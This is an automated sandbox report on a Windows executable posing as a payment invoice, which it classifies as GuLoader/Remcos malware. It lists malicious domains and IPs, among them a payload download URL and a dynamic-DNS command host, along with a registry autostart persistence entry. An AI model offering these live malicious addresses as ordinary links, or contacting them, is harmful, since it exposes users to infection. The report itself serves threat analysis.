              http://pki.goog/gsr1/gsr1.crt020%Avira URL Cloudsafe
              http://pki.goog/repo/certs/gts1c3.der071%VirustotalBrowse
              https://sb.scorecardresearch.com/beacon.js0%VirustotalBrowse
              https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat0%VirustotalBrowse
              http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl00%VirustotalBrowse
              http://pki.goog/repo/certs/gts1c3.der0$0%Avira URL Cloudsafe
              https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.0%Avira URL Cloudsafe
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe
              http://pki.goog/gsr1/gsr1.crt020%VirustotalBrowse
              https://get3.adobe0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=wsb0%VirustotalBrowse
              http://pki.goog/repo/certs/gts1c3.der0$0%VirustotalBrowse
              https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              gudanidevelopment.ge
              		217.147.225.69
              		truetrueunknown
              geoplugin.net
              		178.237.33.50
              		truefalseunknown
              ourt2949aslumes9.duckdns.org
              		unknown
              		unknowntrueunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://odc.offiwab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.jsbhv3A27.tmp.9.drfalse
                		high
                http://www.imvu.comrwab.exe, 00000007.00000002.45066782478.0000000035600000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpgbhv3A27.tmp.9.drfalse
                  		high
                  https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.pngbhv3A27.tmp.9.drfalse
                    		high
                    https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.jsbhv3A27.tmp.9.drfalse
                      		high
                      https://csp.withgoogle.com/csp/ads-programmablebhv3A27.tmp.9.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.adobe.wab.exe, 00000009.00000003.40250168695.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40249957635.00000000046B3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.40254635212.00000000046B5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251372783.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40250671986.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40249997725.00000000046B3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.nirsoft.netwab.exe, 00000009.00000002.40252547768.0000000000306000.00000004.00000010.00020000.00000000.sdmpfalse
                        		high
                        https://aefd.nelreports.net/api/report?cat=bingaotakbhv3A27.tmp.9.drfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2bhv3A27.tmp.9.drfalse
                          		high
                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684bhv3A27.tmp.9.drfalse
                            		high
                            https://deff.nelreports.net/api/report?cat=msnbhv3A27.tmp.9.drfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://gudanidevelopment.ge/IogvoayYhe139.binSchoSvltathirchimie.com/IogvoayYhe139.binwab.exe, 00000007.00000002.45065735573.00000000342A0000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://www.google.com/chrome/wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drfalse
                              		high
                              http://cdp.thawte.com/ThawteRSACA2018.crl0Lbhv3A27.tmp.9.drfalse
                                		high
                                https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7bhv3A27.tmp.9.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.google.com/recaptcha/apiwab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://csp.withgoogle.com/csp/botguard-scsbhv3A27.tmp.9.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-aclbhv3A27.tmp.9.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://s1.adform.net/Banners/Elements/Files/2070608/10170131/10170131.js?ADFassetID=10170131&bv=258bhv3A27.tmp.9.drfalse
                                    		high
                                    https://www.google.com/chrome/https://wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0bhv3A27.tmp.9.drfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.imvu.com/hrqwab.exe, 0000000B.00000002.40221415732.00000000000DC000.00000004.00000010.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.msn.combhv3A27.tmp.9.drfalse
                                          		high
                                          https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80bhv3A27.tmp.9.drfalse
                                            		high
                                            https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wobhv3A27.tmp.9.drfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://btloader.com/tag?o=6208086025961472&upapi=truebhv3A27.tmp.9.drfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.imvu.comatawab.exe, 0000000B.00000002.40221938113.0000000002CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3bhv3A27.tmp.9.drfalse
                                              		high
                                              https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgbhv3A27.tmp.9.drfalse
                                                		high
                                                https://b1sync.zemanta.com/usersync/msn/?puid=101156F9176C6E98058F466E16B36FACbhv3A27.tmp.9.drfalse
                                                  		high
                                                  https://contextual.medwab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2bhv3A27.tmp.9.drfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843bhv3A27.tmp.9.drfalse
                                                    		high
                                                    http://ocsp.sca1b.amazontrust.com06bhv3A27.tmp.9.drfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://certs.godaddy.com/repository/1301bhv3A27.tmp.9.drfalse
                                                      		high
                                                      http://www.imvu.comwab.exe, wab.exe, 0000000B.00000002.40221938113.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://contextual.media.net/checkswab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://ocsp.rootca1.amazontrust.com0:bhv3A27.tmp.9.drfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://certs.godaddy.com/repository/0bhv3A27.tmp.9.drfalse
                                                            		high
                                                            https://pki.goog/repository/0bhv3A27.tmp.9.drfalse
                                                            • 0%, Virustotal, Browse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.msn.com/bhv3A27.tmp.9.drfalse
                                                              		high
                                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480bhv3A27.tmp.9.drfalse
                                                                		high
                                                                http://cacerts.thawte.com/ThawteRSACA2018.crt0bhv3A27.tmp.9.drfalse
                                                                  		high
                                                                  http://crl.godaddy.com/gdroot-g2.crl0Fbhv3A27.tmp.9.drfalse
                                                                    		high
                                                                    http://crl.rootg2.amazontrust.com/rootg2.crl0bhv3A27.tmp.9.drfalse
                                                                    • 0%, Virustotal, Browse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drfalse
                                                                      		high
                                                                      https://www.msn.com/?ocid=iehpwab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40240184394.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drfalse
                                                                        		high
                                                                        https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9bhv3A27.tmp.9.drfalse
                                                                          		high
                                                                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144bhv3A27.tmp.9.drfalse
                                                                            		high
                                                                            https://aefd.nelreports.net/api/report?cat=bingrmsbhv3A27.tmp.9.drfalse
                                                                            • 0%, Virustotal, Browse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.google.com/accounts/serviceloginwab.exefalse
                                                                              		high
                                                                              http://trc.taboola.com/p3p.xmlbhv3A27.tmp.9.drfalse
                                                                                		high
                                                                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729bhv3A27.tmp.9.drfalse
                                                                                  		high
                                                                                  https://tpc.gwab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://2542116.fls.doublecliwab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platbhv3A27.tmp.9.drfalse
                                                                                  • 0%, Virustotal, Browse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://crl.pki.goog/gsr1/gsr1.crl0;bhv3A27.tmp.9.drfalse
                                                                                  • 0%, Virustotal, Browse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpgbhv3A27.tmp.9.drfalse
                                                                                    		high
                                                                                    http://crl.godaddy.com/gdig2s1-2558.crl0bhv3A27.tmp.9.drfalse
                                                                                      		high
                                                                                      http://ocsp.sectigo.com0bhv3A27.tmp.9.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://csp.withgoogle.com/csp/report-to/botguard-scsbhv3A27.tmp.9.drfalse
                                                                                      • 0%, Virustotal, Browse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.msn.com/de-ch/https://wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://certificates.godaddy.com/repository/0bhv3A27.tmp.9.drfalse
                                                                                          		high
                                                                                          https://aefd.nelreports.net/api/report?cat=bingthbhv3A27.tmp.9.drfalse
                                                                                          • 0%, Virustotal, Browse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626bhv3A27.tmp.9.drfalse
                                                                                            		high
                                                                                            https://eb2.3lift.com/sync?wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40240352351.0000000004DC1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drfalse
                                                                                              		high
                                                                                              https://acdn.adnxs.com/dmp/async_usersync.htmlbhv3A27.tmp.9.drfalse
                                                                                                		high
                                                                                                https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsbhv3A27.tmp.9.drfalse
                                                                                                  		high
                                                                                                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000007.00000002.45066782478.0000000035600000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0bhv3A27.tmp.9.drfalse
                                                                                                  • 0%, Virustotal, Browse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://csp.withgoogle.com/csp/report-to/adspam-signals-scsbhv3A27.tmp.9.drfalse
                                                                                                  • 0%, Virustotal, Browse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://pki.goog/repo/certs/gts1c3.der07bhv3A27.tmp.9.drfalse
                                                                                                  • 1%, Virustotal, Browse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drfalse
                                                                                                    		high
                                                                                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2bhv3A27.tmp.9.drfalse
                                                                                                      		high
                                                                                                      https://www.google.com/pawab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.msbhv3A27.tmp.9.drfalse
                                                                                                          		high
                                                                                                          https://2542116.fls.doubleclick.net/activwab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://2542116.fls.doublewab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3bhv3A27.tmp.9.drfalse
                                                                                                              		high
                                                                                                              https://www.msn.com/de-ch/?ocid=iehpbhv3A27.tmp.9.drfalse
                                                                                                                		high
                                                                                                                https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drfalse
                                                                                                                  		high
                                                                                                                  https://cdn.taboola.com/TaboolaCookieSyncScript.jsbhv3A27.tmp.9.drfalse
                                                                                                                    		high
                                                                                                                    https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914bhv3A27.tmp.9.drfalse
                                                                                                                      		high
                                                                                                                      https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpegbhv3A27.tmp.9.drfalse
                                                                                                                        		high
                                                                                                                        https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregulabhv3A27.tmp.9.drfalse
                                                                                                                          		high
                                                                                                                          https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1bhv3A27.tmp.9.drfalse
                                                                                                                            		high
                                                                                                                            https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.jsbhv3A27.tmp.9.drfalse
                                                                                                                              		high
                                                                                                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894bhv3A27.tmp.9.drfalse
                                                                                                                                		high
                                                                                                                                https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drfalse
                                                                                                                                  		high
                                                                                                                                  https://www.google.com/pagead/drt/uiwab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drfalse
                                                                                                                                    		high
                                                                                                                                    https://s1.adform.net/stoat/626/s1.adform.net/bootstrap.jsbhv3A27.tmp.9.drfalse
                                                                                                                                      		high
                                                                                                                                      https://sb.scorecardresearch.com/beacon.jsbhv3A27.tmp.9.drfalse
                                                                                                                                      • 0%, Virustotal, Browse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://aefd.nelreports.net/api/report?cat=wsbbhv3A27.tmp.9.drfalse
                                                                                                                                      • 0%, Virustotal, Browse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      http://pki.goog/gsr1/gsr1.crt02bhv3A27.tmp.9.drfalse
                                                                                                                                      • 0%, Virustotal, Browse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      http://pki.goog/repo/certs/gts1c3.der0$bhv3A27.tmp.9.drfalse
                                                                                                                                      • 0%, Virustotal, Browse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.bhv3A27.tmp.9.drfalse
                                                                                                                                      • 0%, Virustotal, Browse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:aubhv3A27.tmp.9.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://get3.adobewab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown

                                                                                                                                      World Map of Contacted IPs

                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs

                                                                                                                                      Public IPs

                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      94.156.6.253
                                                                                                                                      		unknownBulgaria
                                                                                                                                      		43561NET1-ASBGtrue
                                                                                                                                      217.147.225.69
                                                                                                                                      		gudanidevelopment.geGeorgia
                                                                                                                                      		20545GRENA-ASTbilisiGeorgiaGEtrue
                                                                                                                                      178.237.33.50
                                                                                                                                      		geoplugin.netNetherlands
                                                                                                                                      		8455ATOM86-ASATOM86NLfalse

                                                                                                                                      General Information

                                                                                                                                      Joe Sandbox Version:38.0.0 Ammolite
                                                                                                                                      Analysis ID:1334833
                                                                                                                                      Start date and time:2023-10-31 13:17:34 +01:00
                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 16m 59s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                      Run name:Suspected Instruction Hammering
                                                                                                                                      Number of analysed new started processes analysed:12
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Sample file name:18001787_down_payment_invoice_90002104.exe
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.phis.troj.spyw.evad.winEXE@9/18@4/3
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 97%
                                                                                                                                      • Number of executed functions: 183
                                                                                                                                      • Number of non-executed functions: 325
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                      Warnings

                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                      • Excluded domains from analysis (whitelisted): spclient.wg.spotify.com
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

                                                                                                                                      TimeTypeDescription
                                                                                                                                      12:19:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Dominionist C:\Users\user\AppData\Local\Temp\Dendrobe\Filamenterne.exe
                                                                                                                                      12:20:01AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Dominionist C:\Users\user\AppData\Local\Temp\Dendrobe\Filamenterne.exe
                                                                                                                                      13:20:31API Interceptor31049940x Sleep call for process: wab.exe modified

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      94.156.6.253DHRI_kurumsal kimlik rehberi-2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                        DHRI_kurumsal_kimlik_rehberi-2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                          #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                            a.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                              .09.2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                Documents_for_LUSAR_MSCU5480336_CC_416.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                  PSID CA 0338-2023-24.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                    SMGS-RCDU5010031.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                      SecuriteInfo.com.W32.Trojan.SLJK-2619.17130.29308.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                        PSID_CA_0338-2023-24.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                          RC_S23_3274 Or_amento ADP 231019_5_5009.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                            23IK-1799-REF09NSEP-GERMAMY-TBILIS.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                              booking_#U0414#U043e#U043c#U043e#U0434#U0435#U0434#U043e#U0432#U043e_-_Price_2_Trucks_EURO_TRUCK.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                SirtakiQuote No 104-346.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                  2023.10.11.59363PR69186_1.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                    CMR CA4653XT -10-10-2023-7.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                      SirtakiQuote_No_104-346.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                        vxJjLEvhQU.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                          Or_amento_ARSENAL_260921_5_4808.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                            #U041a#U043e#U043d#U0442#U0440#U0430#U043a#U0442_#U2116_OX-SOC_150923_FOB.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              217.147.225.69DHRI_kurumsal kimlik rehberi-2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              • gudanidevelopment.ge/IogvoayYhe139.bin
                                                                                                                                                                              DHRI_kurumsal_kimlik_rehberi-2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              • gudanidevelopment.ge/IogvoayYhe139.bin
                                                                                                                                                                              #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              • gudanidevelopment.ge/IogvoayYhe139.bin

                                                                                                                                                                              Domains

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              gudanidevelopment.gez27Icycold_Orcamento-HPN-100001329016-1.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                              • 217.147.225.69
                                                                                                                                                                              DHRI_kurumsal kimlik rehberi-2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              • 217.147.225.69
                                                                                                                                                                              DHRI_kurumsal_kimlik_rehberi-2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              • 217.147.225.69
                                                                                                                                                                              #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              • 217.147.225.69
                                                                                                                                                                              geoplugin.netYegdeajzb.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              INVOICE098789#U00b0098980.jarGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              new_purchase_order_catalog_design_no_TZ806_300102023_00000000023.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              DHRI_kurumsal kimlik rehberi-2023.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              SWFIT-MT-101-PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                              Invoice 78284722.docGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 178.237.33.50
